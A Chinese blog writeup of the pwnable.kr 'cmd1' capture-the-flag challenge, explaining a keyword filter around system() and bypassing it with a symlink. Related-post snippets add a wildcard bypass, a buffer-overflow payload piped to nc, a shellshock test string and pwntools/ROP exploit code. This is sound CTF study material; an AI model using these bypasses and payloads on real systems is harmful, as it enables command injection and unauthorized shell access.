pwnable.kr-cmd1 WP

最新推荐文章于 2024-08-20 18:06:53 发布
原创 最新推荐文章于 2024-08-20 18:06:53 发布 · 294 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwnable.kr #cmd1

首先看一下源码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "flag")!=0;		
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    return r;
}
int main(int argc, char* argv[], char** envp){
    putenv("PATH=/thankyouverymuch");
    if(filter(argv[1])) return 0;
    system( argv[1] );
    return 0;
}

这题有三个函数:putenvsystemstrstr

petenv()函数原型:
int _putenv(
   const char *envstring 
);
功 能:

putenv()用来改变或增加环境变量的内容。参数envvar的格式为envvar=value,如果该环境变量原先存在,则变量内容会依参数envvar改变,否则此参数内容会成为新的环境变量。参数envvar指定的字符串会变成环境变量的一部分,如果修改这个字符串,环境变量也会跟着被修改。

system()函数原型:
int system(const char *command);
功能:

函数会执行一个shell命令

strstr()函数原型:
extern char *strstr(char *str1, const char *str2);
参数:

str1:被查找目标

str2:要查找对象

返回值:若str2str1的子串,则返回str2str1首次出现的地址;如果str2不是str1的子串,则返回NULL

本题的意思是更改PATH,然后过滤传入的参数,参数里面不能有*“flag”“tmp”“sh”*。然后执行这个参数所代表的命令。因为PATH的值被更改了,所以直接输入命令是不行的,得输入命令的绝对路径(但是echo命令就不用,不知道为什么)

cmd1.png

这里用来一个变量r来表示过滤的结果,如果r0,就能执行,否则退出。而r的值取决于下面的三个式子

    r += strstr(cmd, "flag")!=0;		
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;

首先用strstr查看flag等关键字是不是在参数里,如果在,返回关键字首次出现的地址, 这样就会导致!=0这个判断为真,返回一个不为零的数,导致程序退出。

这里我在/tmp目录下创建了一个自己的目录,/tmp/casuall,然后通过软连接/home/cmd1目录下的flag连接到了我的目录下casuall文件。这么做的理由就是程序过滤了’flag’关键字,不能在当前目录直接cat flag的值。也过滤了’tmp‘,但是我们可以直接在/tmp/casuall目录下执行程序。

cmd0.png

pwnable.kr】0x05-passcode Writeup
weixin_64667536的博客
08-30 585
Ubuntu-SSH连接根据目录信息拉取文件。
pwnable.kr】0x02-collision Writeup
weixin_64667536的博客
08-20 529
拉取文件分析源码阅读源码后,执行样例测试输入2个参数1个参数,程序输出如下。
pwnable.kr-cmd1-Writeup
baikeng3674的博客
02-11 208
MarkdownPad Document pwnable.kr-cmd1-Writeup 这道题挺有意思,这里详细的记录一下; 首先还是ssh远程登录,ls -l查看文件,然后cat cmd1.c读C代码如下: 1 #include <stdio.h> 2 #include <string.h> 3 4 int filt...
pwnable.kr---cmd1
leeham的博客
11-08 819
pwnable.krcmd1解题思路逐步分析题目的含义:putenv("PATH=/fuckyouverymuch");这行代码相当于重写了PATH这个环境变量if(filter(argv[1])) return 0;这行对输入argv[1]继续宁过滤处理,如果返回值为真,则return 0.这里我们需要返回值为false。
pwnable.krcmd1
river
05-09 2357
cmd1 IDA看源码: filter函数,要求第二个参数中不能有flag、sh、tmp字符串,成功返回之后,利用system调用第一个参数。 测试的时候,输入./cmd1 “/bin/cat /home/cmd1/flag”果然不行。 不过我记得Linux中可以用通配符* 所以用:./cmd1 “/bin/cat /home/cmd1/fl*”
Pwnable.kr WP
AlexYoung28的博客
08-13 1070
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
FILE_DESCRIPTION pwnable.kr wp
moep0的博客
10-27 247
问题要求我们访问ssh fd@pwnable.kr -p 2222   我们按照上述描述访问,查看一下文件夹。 flag文件引起了我们的注意 访问失败 难道要提权吗,一个1pt的题目欸...... ctrl+shift+t (Alt+1可以切换)开一个新的terminal 把这个c文件源代码下下来看一下 出现了几个不认识(假装)的函数 我们来看一下 先是atoi...
pwnable.kr】0x01-fd Writeup
weixin_64667536的博客
08-20 372
Ubuntu连接靶机(连不通的可以试一下proxychains)scp命令拷贝下fd源码文件。
pwnable.kr做题笔记(一)
has_zaoganmaqule的博客
08-12 2145
调用 `printf` 函数,`bl` 指令用于分支并链接,保存返回地址到链接寄存器 `lr`。- 将 `r4`, `r11`, 和 `lr` 寄存器的值压入栈中,用于保存函数调用前的状态。- 将 `r3` 的值(0)存储到 `r11` 指向的位置的偏移量 -16 处。- 如果 `r2` 和 `r3` 不相等,跳转到 `0x8da8` 地址处。- 调用 `scanf` 函数,`r0` 和 `r1` 作为参数传递。- 从 `r11` 指向的位置的偏移量 -16 处加载值到 `r3`。
pwnable.kr-fix
r00tnb的博客
02-28 948
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include &amp;lt;stdio.h&amp;gt; // 23byte shellcode from http://shell-storm...
pwnable.kr-flag WP
Casuall的博客
03-26 506
将文件下载下来,用file命令查看一下,是一个64位可执行文件 用64位的IDA打开,发现里面的函数少的可怜,疑似加壳了 放到查壳工具里看一下,发现是UPX的壳,这里用linux下的命令xxd flag | tail(xxd的作用就是将一个文件以十六进制的形式显示出来,tail命令用途是依照要求将指定的文件的最后部分输出到标准设备,通常是终端,通俗讲来,就是把某个档案文件的最后几行显示到终端上...
pwnable.kr wp fd
fa1c4的blog
05-17 189
题目 Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw ssh fd@pwnable.kr -p2222 (pw:guest) ssh fd@pwnable.kr -p2222 # passwd: guest 解题过
pwnable.kr wp uaf
fa1c4的blog
01-19 269
题目 Mommy, what is Use After Free bug? ssh uaf@pwnable.kr -p2222 (pw:guest) 题解 #include <fcntl.h> #include <iostream> #include <cstring> #include <cstdlib> #include <unistd.h> using namespace std; class Human{ private: vir
pwnable.kr wp&总结
Ree的整理与收集
08-30 1111
1.fd2.collision3.bof(python -c ‘print “A” * 52 + “\xbe\xba\xfe\xca”’; cat -) | nc pwnable.kr 9000 python -c 参数 linux | 命令:command 1 | command 2 把command 1的结果传给command 2做参数
pwnable.kr-shellshock WP
Casuall的博客
05-08 407
这道题涉及的知识点是shellshock(也叫破壳漏洞)CVE-2014-6271,GNU Bash 版本小于等于4.3可能存在这个漏洞。首先查看一下有什么文件 发现目录里有一个可执行文件bash,我们来查看一下bash的版本 可以看到这个路径中的bash版本低于4.3,下面来测试一下这两个版本的bash是否存在破壳漏洞 env x='() { :;}; echo shellshocked' ...
pwnable.kr wp blackjack
fa1c4的blog
01-19 189
题目 Hey! check out this C implementation of blackjack game! I found it online * http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html I like to give my flags to millionares. how much money you got? Running at : nc pwnable.kr 9
pwnable.kr-bof WP
Casuall的博客
03-24 5775
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
pwnable.kr BOF wp
moep0的博客
10-28 353
放到ida里面反编译一下 gets不要太明显(gets不会对输入的字符串长度进行判断) 这个时候我发现,原来有源码。。。 没关系,拿ida看一下overflowmw和key的位置 发现相差52个byte 第一次写exp,找了一份大佬的 运行一下 成功 ...
pwnable.kr之flag
river
05-02 2700
flag   下载下来是upx 压缩过的文件,用upx –d 解压一下,变为flag_upacked_upx文件,然后再IDA中看。   对flag_upacked_upx用strings 看一下,提取:)特征。(因为这个是pwnable.kr的flag的特征。。。又作弊了) 发现是正确的。。 flag: UPX...? sounds like a deli
pwnable.kr bof
最新发布
09-16
### pwnable.kr bof题目概述 pwnable.kr 是一个著名的在线渗透测试练习平台,bof(Buffer Overflow,缓冲区溢出)题目是其中经典类型。缓冲区溢出通常是由于程序没有正确检查用户输入的长度,导致输入的数据超出了缓冲区的边界,从而覆盖相邻的内存区域,可能改变程序的执行流程。 ### 解题思路与步骤 #### 1. 环境准备 首先需要在本地搭建好调试环境,安装必要的工具,如`gdb`(GNU调试器)、`pwntools`(Python 库,用于编写漏洞利用脚本)等。例如,使用`pwntools`可以方便地与远程服务器进行交互。 ```python from pwn import * # 连接到远程服务器 p = remote('pwnable.kr', 9000) ``` #### 2. 分析程序 - **反汇编**:使用`objdump`或`gdb`对目标程序进行反汇编,查看程序的汇编代码,了解程序的逻辑和函数调用关系。例如,使用`objdump -d bof`可以得到程序的反汇编代码。 - **检查漏洞点**:重点关注程序中存在缓冲区操作的函数,如`gets`、`strcpy`等,这些函数通常不检查输入的长度,容易引发缓冲区溢出漏洞。 #### 3. 确定缓冲区大小 通过调试程序,向程序输入不同长度的数据,观察程序的行为,确定缓冲区的大小。可以使用`gdb`设置断点,在关键位置查看栈的状态。 ```python # 构造不同长度的测试数据 test_data = 'A' * 10 p.sendline(test_data) ``` #### 4. 覆盖返回地址 当确定了缓冲区大小后,构造恶意输入,覆盖程序的返回地址。返回地址是函数调用结束后程序要跳转执行的地址,通过覆盖它可以改变程序的执行流程。 ```python # 计算返回地址的偏移量 offset = 44 # 假设偏移量为 44 # 构造恶意输入 payload = 'A' * offset # 获取目标地址(如系统函数地址) target_address = p64(0xdeadbeef) payload += target_address p.sendline(payload) ``` #### 5. 利用漏洞执行任意代码 - **调用系统函数**:如果程序中存在可利用的系统函数(如`system`),可以通过覆盖返回地址,将程序的执行流程引导到这些函数上,并传入合适的参数(如`/bin/sh`),从而获得一个 shell。 - **ROP 链**:如果程序中没有合适的系统函数可以直接调用,可以使用 ROP(Return Oriented Programming,面向返回编程)技术,通过拼接多个小的代码片段(gadget)来实现复杂的功能。 ```python # 构造 ROP 链 rop = ROP(elf) # 查找合适的 gadget pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] bin_sh = next(elf.search(b'/bin/sh')) system_addr = elf.symbols['system'] # 构造 ROP 链 rop.raw(pop_rdi) rop.raw(bin_sh) rop.raw(system_addr) # 构造最终的 payload payload = 'A' * offset + str(rop) p.sendline(payload) ``` ### 技术分析 #### 缓冲区溢出原理 缓冲区溢出是由于程序对输入数据的长度没有进行有效的检查,导致输入的数据超出了缓冲区的边界,覆盖了相邻的内存区域。在栈上,函数调用时会保存返回地址等信息,当缓冲区溢出发生时,返回地址可能被覆盖,从而改变程序的执行流程。 #### 栈布局与内存管理 了解栈的布局对于利用缓冲区溢出漏洞至关重要。栈是一种后进先出的数据结构,函数调用时会在栈上分配空间,保存局部变量、参数和返回地址等信息。通过调试和分析栈的状态,可以确定缓冲区的位置和返回地址的偏移量。 #### 保护机制绕过 现代操作系统和编译器通常会采用一些保护机制,如 ASLR(地址空间布局随机化)、Canary(栈保护)等,来防止缓冲区溢出漏洞的利用。在解题过程中,需要了解这些保护机制,并寻找相应的绕过方法。例如,对于 ASLR,可以通过泄露程序的基地址来绕过;对于 Canary,可以通过泄露 Canary 的值来绕过。 ### 总结 解决 pwnable.kr 的 bof 题目需要掌握缓冲区溢出的基本原理、调试技巧和漏洞利用技术。通过不断地练习和实践,可以提高对漏洞的分析和利用能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值